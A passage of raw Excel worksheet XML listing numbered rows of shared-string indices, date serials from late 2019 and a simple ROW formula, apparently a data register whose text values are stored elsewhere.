    <row r="13746" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13746">
        <f t="shared" si="214"/>
        <v>13745</v>
      </c>
      <c r="B13746">
        <v>3745</v>
      </c>
      <c r="C13746" t="s">
        <v>19637</v>
      </c>
      <c r="D13746" s="1">
        <v>43695</v>
      </c>
      <c r="E13746" t="s">
        <v>19680</v>
      </c>
      <c r="F13746" t="s">
        <v>10021</v>
      </c>
      <c r="G13746" t="s">
        <v>24109</v>
      </c>
    </row>
    <row r="13747" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13747">
        <f t="shared" si="214"/>
        <v>13746</v>
      </c>
      <c r="B13747">
        <v>3746</v>
      </c>
      <c r="C13747" t="s">
        <v>19637</v>
      </c>
      <c r="D13747" s="1">
        <v>43682</v>
      </c>
      <c r="E13747" t="s">
        <v>20194</v>
      </c>
      <c r="F13747" t="s">
        <v>10526</v>
      </c>
      <c r="G13747" t="s">
        <v>24110</v>
      </c>
    </row>
    <row r="13748" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13748">
        <f t="shared" si="214"/>
        <v>13747</v>
      </c>
      <c r="B13748">
        <v>3747</v>
      </c>
      <c r="C13748" t="s">
        <v>19637</v>
      </c>
      <c r="D13748" s="1">
        <v>43702</v>
      </c>
      <c r="E13748" t="s">
        <v>24111</v>
      </c>
      <c r="F13748" t="s">
        <v>10526</v>
      </c>
      <c r="G13748" t="s">
        <v>24112</v>
      </c>
    </row>
    <row r="13749" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13749">
        <f t="shared" si="214"/>
        <v>13748</v>
      </c>
      <c r="B13749">
        <v>3748</v>
      </c>
      <c r="C13749" t="s">
        <v>19637</v>
      </c>
      <c r="D13749" s="1">
        <v>43692</v>
      </c>
      <c r="E13749" t="s">
        <v>20774</v>
      </c>
      <c r="F13749" t="s">
        <v>10526</v>
      </c>
      <c r="G13749" t="s">
        <v>24113</v>
      </c>
    </row>
    <row r="13750" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13750">
        <f t="shared" si="214"/>
        <v>13749</v>
      </c>
      <c r="B13750">
        <v>3749</v>
      </c>
      <c r="C13750" t="s">
        <v>19637</v>
      </c>
      <c r="D13750" s="1">
        <v>43701</v>
      </c>
      <c r="E13750" t="s">
        <v>19643</v>
      </c>
      <c r="F13750" t="s">
        <v>10021</v>
      </c>
      <c r="G13750" t="s">
        <v>24114</v>
      </c>
    </row>
    <row r="13751" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13751">
        <f t="shared" si="214"/>
        <v>13750</v>
      </c>
      <c r="B13751">
        <v>3750</v>
      </c>
      <c r="C13751" t="s">
        <v>19637</v>
      </c>
      <c r="D13751" s="1">
        <v>43697</v>
      </c>
      <c r="E13751" t="s">
        <v>21287</v>
      </c>
      <c r="F13751" t="s">
        <v>10526</v>
      </c>
      <c r="G13751" t="s">
        <v>24115</v>
      </c>
    </row>
    <row r="13752" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13752">
        <f t="shared" si="214"/>
        <v>13751</v>
      </c>
      <c r="B13752">
        <v>3751</v>
      </c>
      <c r="C13752" t="s">
        <v>19637</v>
      </c>
      <c r="D13752" s="1">
        <v>43690</v>
      </c>
      <c r="E13752" t="s">
        <v>19701</v>
      </c>
      <c r="F13752" t="s">
        <v>10021</v>
      </c>
      <c r="G13752" t="s">
        <v>24116</v>
      </c>
    </row>
    <row r="13753" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13753">
        <f t="shared" si="214"/>
        <v>13752</v>
      </c>
      <c r="B13753">
        <v>3752</v>
      </c>
      <c r="C13753" t="s">
        <v>19637</v>
      </c>
      <c r="D13753" s="1">
        <v>43689</v>
      </c>
      <c r="E13753" t="s">
        <v>19672</v>
      </c>
      <c r="F13753" t="s">
        <v>10021</v>
      </c>
      <c r="G13753" t="s">
        <v>24117</v>
      </c>
    </row>
    <row r="13754" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13754">
        <f t="shared" si="214"/>
        <v>13753</v>
      </c>
      <c r="B13754">
        <v>3753</v>
      </c>
      <c r="C13754" t="s">
        <v>19637</v>
      </c>
      <c r="D13754" s="1">
        <v>43689</v>
      </c>
      <c r="E13754" t="s">
        <v>23353</v>
      </c>
      <c r="F13754" t="s">
        <v>10021</v>
      </c>
      <c r="G13754" t="s">
        <v>24118</v>
      </c>
    </row>
    <row r="13755" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13755">
        <f t="shared" si="214"/>
        <v>13754</v>
      </c>
      <c r="B13755">
        <v>3754</v>
      </c>
      <c r="C13755" t="s">
        <v>19637</v>
      </c>
      <c r="D13755" s="1">
        <v>43757</v>
      </c>
      <c r="F13755" t="s">
        <v>9978</v>
      </c>
      <c r="G13755" t="s">
        <v>24119</v>
      </c>
    </row>
    <row r="13756" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13756">
        <f t="shared" si="214"/>
        <v>13755</v>
      </c>
      <c r="B13756">
        <v>3755</v>
      </c>
      <c r="C13756" t="s">
        <v>19637</v>
      </c>
      <c r="D13756" s="1">
        <v>43749</v>
      </c>
      <c r="E13756" t="s">
        <v>20154</v>
      </c>
      <c r="F13756" t="s">
        <v>10526</v>
      </c>
      <c r="G13756" t="s">
        <v>24120</v>
      </c>
    </row>
    <row r="13757" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13757">
        <f t="shared" si="214"/>
        <v>13756</v>
      </c>
      <c r="B13757">
        <v>3756</v>
      </c>
      <c r="C13757" t="s">
        <v>19637</v>
      </c>
      <c r="D13757" s="1">
        <v>43748</v>
      </c>
      <c r="F13757" t="s">
        <v>10526</v>
      </c>
      <c r="G13757" t="s">
        <v>24121</v>
      </c>
    </row>
    <row r="13758" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13758">
        <f t="shared" si="214"/>
        <v>13757</v>
      </c>
      <c r="B13758">
        <v>3757</v>
      </c>
      <c r="C13758" t="s">
        <v>19637</v>
      </c>
      <c r="D13758" s="1">
        <v>43747</v>
      </c>
      <c r="E13758" t="s">
        <v>21358</v>
      </c>
      <c r="F13758" t="s">
        <v>10526</v>
      </c>
      <c r="G13758" t="s">
        <v>24122</v>
      </c>
    </row>
    <row r="13759" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13759">
        <f t="shared" si="214"/>
        <v>13758</v>
      </c>
      <c r="B13759">
        <v>3758</v>
      </c>
      <c r="C13759" t="s">
        <v>19637</v>
      </c>
      <c r="D13759" s="1">
        <v>43745</v>
      </c>
      <c r="E13759" t="s">
        <v>19640</v>
      </c>
      <c r="F13759" t="s">
        <v>9975</v>
      </c>
      <c r="G13759" t="s">
        <v>24123</v>
      </c>
    </row>
    <row r="13760" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13760">
        <f t="shared" si="214"/>
        <v>13759</v>
      </c>
      <c r="B13760">
        <v>3759</v>
      </c>
      <c r="C13760" t="s">
        <v>19637</v>
      </c>
      <c r="D13760" s="1">
        <v>43746</v>
      </c>
      <c r="E13760" t="s">
        <v>24124</v>
      </c>
      <c r="F13760" t="s">
        <v>10526</v>
      </c>
      <c r="G13760" t="s">
        <v>24125</v>
      </c>
    </row>
    <row r="13761" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13761">
        <f t="shared" si="214"/>
        <v>13760</v>
      </c>
      <c r="B13761">
        <v>3760</v>
      </c>
      <c r="C13761" t="s">
        <v>19637</v>
      </c>
      <c r="D13761" s="1">
        <v>43751</v>
      </c>
      <c r="E13761" t="s">
        <v>20704</v>
      </c>
      <c r="F13761" t="s">
        <v>10526</v>
      </c>
      <c r="G13761" t="s">
        <v>24126</v>
      </c>
    </row>
    <row r="13762" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13762">
        <f t="shared" si="214"/>
        <v>13761</v>
      </c>
      <c r="B13762">
        <v>3761</v>
      </c>
      <c r="C13762" t="s">
        <v>19637</v>
      </c>
      <c r="D13762" s="1">
        <v>43739</v>
      </c>
      <c r="E13762" t="s">
        <v>22557</v>
      </c>
      <c r="F13762" t="s">
        <v>10526</v>
      </c>
      <c r="G13762" t="s">
        <v>24127</v>
      </c>
    </row>
    <row r="13763" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13763">
        <f t="shared" ref="A13763:A13826" si="215">+ROW(A13762)</f>
        <v>13762</v>
      </c>
      <c r="B13763">
        <v>3762</v>
      </c>
      <c r="C13763" t="s">
        <v>19637</v>
      </c>
      <c r="D13763" s="1">
        <v>43754</v>
      </c>
      <c r="E13763" t="s">
        <v>19717</v>
      </c>
      <c r="F13763" t="s">
        <v>10526</v>
      </c>
      <c r="G13763" t="s">
        <v>24128</v>
      </c>
    </row>
    <row r="13764" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13764">
        <f t="shared" si="215"/>
        <v>13763</v>
      </c>
      <c r="B13764">
        <v>3763</v>
      </c>
      <c r="C13764" t="s">
        <v>19637</v>
      </c>
      <c r="D13764" s="1">
        <v>43742</v>
      </c>
      <c r="E13764" t="s">
        <v>19640</v>
      </c>
      <c r="F13764" t="s">
        <v>9975</v>
      </c>
      <c r="G13764" t="s">
        <v>24129</v>
      </c>
    </row>
    <row r="13765" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13765">
        <f t="shared" si="215"/>
        <v>13764</v>
      </c>
      <c r="B13765">
        <v>3764</v>
      </c>
      <c r="C13765" t="s">
        <v>19637</v>
      </c>
      <c r="D13765" s="1">
        <v>43747</v>
      </c>
      <c r="E13765" t="s">
        <v>23692</v>
      </c>
      <c r="F13765" t="s">
        <v>10021</v>
      </c>
      <c r="G13765" t="s">
        <v>24130</v>
      </c>
    </row>
    <row r="13766" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13766">
        <f t="shared" si="215"/>
        <v>13765</v>
      </c>
      <c r="B13766">
        <v>3765</v>
      </c>
      <c r="C13766" t="s">
        <v>19637</v>
      </c>
      <c r="D13766" s="1">
        <v>43739</v>
      </c>
      <c r="E13766" t="s">
        <v>19650</v>
      </c>
      <c r="F13766" t="s">
        <v>10021</v>
      </c>
      <c r="G13766" t="s">
        <v>24131</v>
      </c>
    </row>
    <row r="13767" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13767">
        <f t="shared" si="215"/>
        <v>13766</v>
      </c>
      <c r="B13767">
        <v>3766</v>
      </c>
      <c r="C13767" t="s">
        <v>19637</v>
      </c>
      <c r="D13767" s="1">
        <v>43752</v>
      </c>
      <c r="E13767" t="s">
        <v>20964</v>
      </c>
      <c r="F13767" t="s">
        <v>10021</v>
      </c>
      <c r="G13767" t="s">
        <v>24132</v>
      </c>
    </row>
    <row r="13768" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13768">
        <f t="shared" si="215"/>
        <v>13767</v>
      </c>
      <c r="B13768">
        <v>3767</v>
      </c>
      <c r="C13768" t="s">
        <v>19637</v>
      </c>
      <c r="D13768" s="1">
        <v>43755</v>
      </c>
      <c r="E13768" t="s">
        <v>24133</v>
      </c>
      <c r="F13768" t="s">
        <v>10526</v>
      </c>
      <c r="G13768" t="s">
        <v>24134</v>
      </c>
    </row>
    <row r="13769" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13769">
        <f t="shared" si="215"/>
        <v>13768</v>
      </c>
      <c r="B13769">
        <v>3768</v>
      </c>
      <c r="C13769" t="s">
        <v>19637</v>
      </c>
      <c r="D13769" s="1">
        <v>43756</v>
      </c>
      <c r="E13769" t="s">
        <v>19690</v>
      </c>
      <c r="F13769" t="s">
        <v>9978</v>
      </c>
      <c r="G13769" t="s">
        <v>24135</v>
      </c>
    </row>
    <row r="13770" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13770">
        <f t="shared" si="215"/>
        <v>13769</v>
      </c>
      <c r="B13770">
        <v>3769</v>
      </c>
      <c r="C13770" t="s">
        <v>19637</v>
      </c>
      <c r="D13770" s="1">
        <v>43742</v>
      </c>
      <c r="E13770" t="s">
        <v>24136</v>
      </c>
      <c r="F13770" t="s">
        <v>10526</v>
      </c>
      <c r="G13770" t="s">
        <v>24137</v>
      </c>
    </row>
    <row r="13771" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13771">
        <f t="shared" si="215"/>
        <v>13770</v>
      </c>
      <c r="B13771">
        <v>3770</v>
      </c>
      <c r="C13771" t="s">
        <v>19637</v>
      </c>
      <c r="D13771" s="1">
        <v>43744</v>
      </c>
      <c r="E13771" t="s">
        <v>19680</v>
      </c>
      <c r="F13771" t="s">
        <v>10021</v>
      </c>
      <c r="G13771" t="s">
        <v>24138</v>
      </c>
    </row>
    <row r="13772" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13772">
        <f t="shared" si="215"/>
        <v>13771</v>
      </c>
      <c r="B13772">
        <v>3771</v>
      </c>
      <c r="C13772" t="s">
        <v>19637</v>
      </c>
      <c r="D13772" s="1">
        <v>43749</v>
      </c>
      <c r="F13772" t="s">
        <v>10526</v>
      </c>
      <c r="G13772" t="s">
        <v>24139</v>
      </c>
    </row>
    <row r="13773" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13773">
        <f t="shared" si="215"/>
        <v>13772</v>
      </c>
      <c r="B13773">
        <v>3772</v>
      </c>
      <c r="C13773" t="s">
        <v>19637</v>
      </c>
      <c r="D13773" s="1">
        <v>43750</v>
      </c>
      <c r="F13773" t="s">
        <v>10526</v>
      </c>
      <c r="G13773" t="s">
        <v>24140</v>
      </c>
    </row>
    <row r="13774" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13774">
        <f t="shared" si="215"/>
        <v>13773</v>
      </c>
      <c r="B13774">
        <v>3773</v>
      </c>
      <c r="C13774" t="s">
        <v>19637</v>
      </c>
      <c r="D13774" s="1">
        <v>43742</v>
      </c>
      <c r="E13774" t="s">
        <v>19695</v>
      </c>
      <c r="F13774" t="s">
        <v>9975</v>
      </c>
      <c r="G13774" t="s">
        <v>24141</v>
      </c>
    </row>
    <row r="13775" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13775">
        <f t="shared" si="215"/>
        <v>13774</v>
      </c>
      <c r="B13775">
        <v>3774</v>
      </c>
      <c r="C13775" t="s">
        <v>19637</v>
      </c>
      <c r="D13775" s="1">
        <v>43748</v>
      </c>
      <c r="E13775" t="s">
        <v>20774</v>
      </c>
      <c r="F13775" t="s">
        <v>10526</v>
      </c>
      <c r="G13775" t="s">
        <v>24142</v>
      </c>
    </row>
    <row r="13776" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13776">
        <f t="shared" si="215"/>
        <v>13775</v>
      </c>
      <c r="B13776">
        <v>3775</v>
      </c>
      <c r="C13776" t="s">
        <v>19637</v>
      </c>
      <c r="D13776" s="1">
        <v>43750</v>
      </c>
      <c r="F13776" t="s">
        <v>9975</v>
      </c>
      <c r="G13776" t="s">
        <v>24143</v>
      </c>
    </row>
    <row r="13777" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13777">
        <f t="shared" si="215"/>
        <v>13776</v>
      </c>
      <c r="B13777">
        <v>3776</v>
      </c>
      <c r="C13777" t="s">
        <v>19637</v>
      </c>
      <c r="D13777" s="1">
        <v>43747</v>
      </c>
      <c r="E13777" t="s">
        <v>24144</v>
      </c>
      <c r="F13777" t="s">
        <v>9978</v>
      </c>
      <c r="G13777" t="s">
        <v>24145</v>
      </c>
    </row>
    <row r="13778" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13778">
        <f t="shared" si="215"/>
        <v>13777</v>
      </c>
      <c r="B13778">
        <v>3777</v>
      </c>
      <c r="C13778" t="s">
        <v>19637</v>
      </c>
      <c r="D13778" s="1">
        <v>43740</v>
      </c>
      <c r="E13778" t="s">
        <v>24146</v>
      </c>
      <c r="F13778" t="s">
        <v>10526</v>
      </c>
      <c r="G13778" t="s">
        <v>24147</v>
      </c>
    </row>
    <row r="13779" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13779">
        <f t="shared" si="215"/>
        <v>13778</v>
      </c>
      <c r="B13779">
        <v>3778</v>
      </c>
      <c r="C13779" t="s">
        <v>19637</v>
      </c>
      <c r="D13779" s="1">
        <v>43754</v>
      </c>
      <c r="E13779" t="s">
        <v>19640</v>
      </c>
      <c r="F13779" t="s">
        <v>9975</v>
      </c>
      <c r="G13779" t="s">
        <v>24148</v>
      </c>
    </row>
    <row r="13780" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13780">
        <f t="shared" si="215"/>
        <v>13779</v>
      </c>
      <c r="B13780">
        <v>3779</v>
      </c>
      <c r="C13780" t="s">
        <v>19637</v>
      </c>
      <c r="D13780" s="1">
        <v>43747</v>
      </c>
      <c r="E13780" t="s">
        <v>20005</v>
      </c>
      <c r="F13780" t="s">
        <v>9975</v>
      </c>
      <c r="G13780" t="s">
        <v>24149</v>
      </c>
    </row>
    <row r="13781" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13781">
        <f t="shared" si="215"/>
        <v>13780</v>
      </c>
      <c r="B13781">
        <v>3780</v>
      </c>
      <c r="C13781" t="s">
        <v>19637</v>
      </c>
      <c r="D13781" s="1">
        <v>43754</v>
      </c>
      <c r="E13781" t="s">
        <v>24150</v>
      </c>
      <c r="F13781" t="s">
        <v>10526</v>
      </c>
      <c r="G13781" t="s">
        <v>24151</v>
      </c>
    </row>
    <row r="13782" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13782">
        <f t="shared" si="215"/>
        <v>13781</v>
      </c>
      <c r="B13782">
        <v>3781</v>
      </c>
      <c r="C13782" t="s">
        <v>19637</v>
      </c>
      <c r="D13782" s="1">
        <v>43747</v>
      </c>
      <c r="F13782" t="s">
        <v>10526</v>
      </c>
      <c r="G13782" t="s">
        <v>24152</v>
      </c>
    </row>
    <row r="13783" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13783">
        <f t="shared" si="215"/>
        <v>13782</v>
      </c>
      <c r="B13783">
        <v>3782</v>
      </c>
      <c r="C13783" t="s">
        <v>19637</v>
      </c>
      <c r="D13783" s="1">
        <v>43745</v>
      </c>
      <c r="E13783" t="s">
        <v>19687</v>
      </c>
      <c r="F13783" t="s">
        <v>10021</v>
      </c>
      <c r="G13783" t="s">
        <v>24153</v>
      </c>
    </row>
    <row r="13784" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13784">
        <f t="shared" si="215"/>
        <v>13783</v>
      </c>
      <c r="B13784">
        <v>3783</v>
      </c>
      <c r="C13784" t="s">
        <v>19637</v>
      </c>
      <c r="D13784" s="1">
        <v>43747</v>
      </c>
      <c r="E13784" t="s">
        <v>21369</v>
      </c>
      <c r="F13784" t="s">
        <v>9975</v>
      </c>
      <c r="G13784" t="s">
        <v>24154</v>
      </c>
    </row>
    <row r="13785" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13785">
        <f t="shared" si="215"/>
        <v>13784</v>
      </c>
      <c r="B13785">
        <v>3784</v>
      </c>
      <c r="C13785" t="s">
        <v>19637</v>
      </c>
      <c r="D13785" s="1">
        <v>43749</v>
      </c>
      <c r="E13785" t="s">
        <v>24155</v>
      </c>
      <c r="F13785" t="s">
        <v>9975</v>
      </c>
      <c r="G13785" t="s">
        <v>24156</v>
      </c>
    </row>
    <row r="13786" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13786">
        <f t="shared" si="215"/>
        <v>13785</v>
      </c>
      <c r="B13786">
        <v>3785</v>
      </c>
      <c r="C13786" t="s">
        <v>19637</v>
      </c>
      <c r="D13786" s="1">
        <v>43739</v>
      </c>
      <c r="E13786" t="s">
        <v>19650</v>
      </c>
      <c r="F13786" t="s">
        <v>10021</v>
      </c>
      <c r="G13786" t="s">
        <v>24157</v>
      </c>
    </row>
    <row r="13787" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13787">
        <f t="shared" si="215"/>
        <v>13786</v>
      </c>
      <c r="B13787">
        <v>3786</v>
      </c>
      <c r="C13787" t="s">
        <v>19637</v>
      </c>
      <c r="D13787" s="1">
        <v>43741</v>
      </c>
      <c r="F13787" t="s">
        <v>10526</v>
      </c>
      <c r="G13787" t="s">
        <v>24158</v>
      </c>
    </row>
    <row r="13788" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13788">
        <f t="shared" si="215"/>
        <v>13787</v>
      </c>
      <c r="B13788">
        <v>3787</v>
      </c>
      <c r="C13788" t="s">
        <v>19637</v>
      </c>
      <c r="D13788" s="1">
        <v>43752</v>
      </c>
      <c r="F13788" t="s">
        <v>10526</v>
      </c>
      <c r="G13788" t="s">
        <v>24159</v>
      </c>
    </row>
    <row r="13789" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13789">
        <f t="shared" si="215"/>
        <v>13788</v>
      </c>
      <c r="B13789">
        <v>3788</v>
      </c>
      <c r="C13789" t="s">
        <v>19637</v>
      </c>
      <c r="D13789" s="1">
        <v>43748</v>
      </c>
      <c r="E13789" t="s">
        <v>20113</v>
      </c>
      <c r="F13789" t="s">
        <v>9978</v>
      </c>
      <c r="G13789" t="s">
        <v>24160</v>
      </c>
    </row>
    <row r="13790" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13790">
        <f t="shared" si="215"/>
        <v>13789</v>
      </c>
      <c r="B13790">
        <v>3789</v>
      </c>
      <c r="C13790" t="s">
        <v>19637</v>
      </c>
      <c r="D13790" s="1">
        <v>43755</v>
      </c>
      <c r="F13790" t="s">
        <v>10526</v>
      </c>
      <c r="G13790" t="s">
        <v>24161</v>
      </c>
    </row>
    <row r="13791" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13791">
        <f t="shared" si="215"/>
        <v>13790</v>
      </c>
      <c r="B13791">
        <v>3790</v>
      </c>
      <c r="C13791" t="s">
        <v>19637</v>
      </c>
      <c r="D13791" s="1">
        <v>43741</v>
      </c>
      <c r="E13791" t="s">
        <v>19640</v>
      </c>
      <c r="F13791" t="s">
        <v>10021</v>
      </c>
      <c r="G13791" t="s">
        <v>21552</v>
      </c>
    </row>
    <row r="13792" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13792">
        <f t="shared" si="215"/>
        <v>13791</v>
      </c>
      <c r="B13792">
        <v>3791</v>
      </c>
      <c r="C13792" t="s">
        <v>19637</v>
      </c>
      <c r="D13792" s="1">
        <v>43754</v>
      </c>
      <c r="E13792" t="s">
        <v>19640</v>
      </c>
      <c r="F13792" t="s">
        <v>10021</v>
      </c>
      <c r="G13792" t="s">
        <v>24162</v>
      </c>
    </row>
    <row r="13793" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13793">
        <f t="shared" si="215"/>
        <v>13792</v>
      </c>
      <c r="B13793">
        <v>3792</v>
      </c>
      <c r="C13793" t="s">
        <v>19637</v>
      </c>
      <c r="D13793" s="1">
        <v>43743</v>
      </c>
      <c r="E13793" t="s">
        <v>24163</v>
      </c>
      <c r="F13793" t="s">
        <v>9978</v>
      </c>
      <c r="G13793" t="s">
        <v>24164</v>
      </c>
    </row>
    <row r="13794" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13794">
        <f t="shared" si="215"/>
        <v>13793</v>
      </c>
      <c r="B13794">
        <v>3793</v>
      </c>
      <c r="C13794" t="s">
        <v>19637</v>
      </c>
      <c r="D13794" s="1">
        <v>43747</v>
      </c>
      <c r="E13794" t="s">
        <v>19796</v>
      </c>
      <c r="F13794" t="s">
        <v>10021</v>
      </c>
      <c r="G13794" t="s">
        <v>24165</v>
      </c>
    </row>
    <row r="13795" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13795">
        <f t="shared" si="215"/>
        <v>13794</v>
      </c>
      <c r="B13795">
        <v>3794</v>
      </c>
      <c r="C13795" t="s">
        <v>19637</v>
      </c>
      <c r="D13795" s="1">
        <v>43739</v>
      </c>
      <c r="E13795" t="s">
        <v>19680</v>
      </c>
      <c r="F13795" t="s">
        <v>10021</v>
      </c>
      <c r="G13795" t="s">
        <v>24166</v>
      </c>
    </row>
    <row r="13796" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13796">
        <f t="shared" si="215"/>
        <v>13795</v>
      </c>
      <c r="B13796">
        <v>3795</v>
      </c>
      <c r="C13796" t="s">
        <v>19637</v>
      </c>
      <c r="D13796" s="1">
        <v>43753</v>
      </c>
      <c r="F13796" t="s">
        <v>10526</v>
      </c>
      <c r="G13796" t="s">
        <v>24167</v>
      </c>
    </row>
    <row r="13797" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13797">
        <f t="shared" si="215"/>
        <v>13796</v>
      </c>
      <c r="B13797">
        <v>3796</v>
      </c>
      <c r="C13797" t="s">
        <v>19637</v>
      </c>
      <c r="D13797" s="1">
        <v>43753</v>
      </c>
      <c r="E13797" t="s">
        <v>20515</v>
      </c>
      <c r="F13797" t="s">
        <v>10021</v>
      </c>
      <c r="G13797" t="s">
        <v>24168</v>
      </c>
    </row>
    <row r="13798" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13798">
        <f t="shared" si="215"/>
        <v>13797</v>
      </c>
      <c r="B13798">
        <v>3797</v>
      </c>
      <c r="C13798" t="s">
        <v>19637</v>
      </c>
      <c r="D13798" s="1">
        <v>43756</v>
      </c>
      <c r="E13798" t="s">
        <v>19750</v>
      </c>
      <c r="F13798" t="s">
        <v>9978</v>
      </c>
      <c r="G13798" t="s">
        <v>24169</v>
      </c>
    </row>
    <row r="13799" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13799">
        <f t="shared" si="215"/>
        <v>13798</v>
      </c>
      <c r="B13799">
        <v>3798</v>
      </c>
      <c r="C13799" t="s">
        <v>19637</v>
      </c>
      <c r="D13799" s="1">
        <v>43754</v>
      </c>
      <c r="E13799" t="s">
        <v>19717</v>
      </c>
      <c r="F13799" t="s">
        <v>10526</v>
      </c>
      <c r="G13799" t="s">
        <v>24170</v>
      </c>
    </row>
    <row r="13800" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13800">
        <f t="shared" si="215"/>
        <v>13799</v>
      </c>
      <c r="B13800">
        <v>3799</v>
      </c>
      <c r="C13800" t="s">
        <v>19637</v>
      </c>
      <c r="D13800" s="1">
        <v>43743</v>
      </c>
      <c r="E13800" t="s">
        <v>24171</v>
      </c>
      <c r="F13800" t="s">
        <v>10526</v>
      </c>
      <c r="G13800" t="s">
        <v>24172</v>
      </c>
    </row>
    <row r="13801" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13801">
        <f t="shared" si="215"/>
        <v>13800</v>
      </c>
      <c r="B13801">
        <v>3800</v>
      </c>
      <c r="C13801" t="s">
        <v>19637</v>
      </c>
      <c r="D13801" s="1">
        <v>43740</v>
      </c>
      <c r="E13801" t="s">
        <v>24173</v>
      </c>
      <c r="F13801" t="s">
        <v>10021</v>
      </c>
      <c r="G13801" t="s">
        <v>24174</v>
      </c>
    </row>
    <row r="13802" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13802">
        <f t="shared" si="215"/>
        <v>13801</v>
      </c>
      <c r="B13802">
        <v>3801</v>
      </c>
      <c r="C13802" t="s">
        <v>19637</v>
      </c>
      <c r="D13802" s="1">
        <v>43747</v>
      </c>
      <c r="F13802" t="s">
        <v>9975</v>
      </c>
      <c r="G13802" t="s">
        <v>24175</v>
      </c>
    </row>
    <row r="13803" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13803">
        <f t="shared" si="215"/>
        <v>13802</v>
      </c>
      <c r="B13803">
        <v>3802</v>
      </c>
      <c r="C13803" t="s">
        <v>19637</v>
      </c>
      <c r="D13803" s="1">
        <v>43750</v>
      </c>
      <c r="F13803" t="s">
        <v>10526</v>
      </c>
      <c r="G13803" t="s">
        <v>24176</v>
      </c>
    </row>
    <row r="13804" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13804">
        <f t="shared" si="215"/>
        <v>13803</v>
      </c>
      <c r="B13804">
        <v>3803</v>
      </c>
      <c r="C13804" t="s">
        <v>19637</v>
      </c>
      <c r="D13804" s="1">
        <v>43742</v>
      </c>
      <c r="E13804" t="s">
        <v>19648</v>
      </c>
      <c r="F13804" t="s">
        <v>10021</v>
      </c>
      <c r="G13804" t="s">
        <v>24177</v>
      </c>
    </row>
    <row r="13805" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13805">
        <f t="shared" si="215"/>
        <v>13804</v>
      </c>
      <c r="B13805">
        <v>3804</v>
      </c>
      <c r="C13805" t="s">
        <v>19637</v>
      </c>
      <c r="D13805" s="1">
        <v>43745</v>
      </c>
      <c r="E13805" t="s">
        <v>19640</v>
      </c>
      <c r="F13805" t="s">
        <v>10021</v>
      </c>
      <c r="G13805" t="s">
        <v>24178</v>
      </c>
    </row>
    <row r="13806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13806">
        <f t="shared" si="215"/>
        <v>13805</v>
      </c>
      <c r="B13806">
        <v>3805</v>
      </c>
      <c r="C13806" t="s">
        <v>19637</v>
      </c>
      <c r="D13806" s="1">
        <v>43741</v>
      </c>
      <c r="E13806" t="s">
        <v>20024</v>
      </c>
      <c r="F13806" t="s">
        <v>10526</v>
      </c>
      <c r="G13806" t="s">
        <v>24179</v>
      </c>
    </row>
    <row r="13807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13807">
        <f t="shared" si="215"/>
        <v>13806</v>
      </c>
      <c r="B13807">
        <v>3806</v>
      </c>
      <c r="C13807" t="s">
        <v>19637</v>
      </c>
      <c r="D13807" s="1">
        <v>43748</v>
      </c>
      <c r="E13807" t="s">
        <v>24180</v>
      </c>
      <c r="F13807" t="s">
        <v>10021</v>
      </c>
      <c r="G13807" t="s">
        <v>24181</v>
      </c>
    </row>
    <row r="13808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13808">
        <f t="shared" si="215"/>
        <v>13807</v>
      </c>
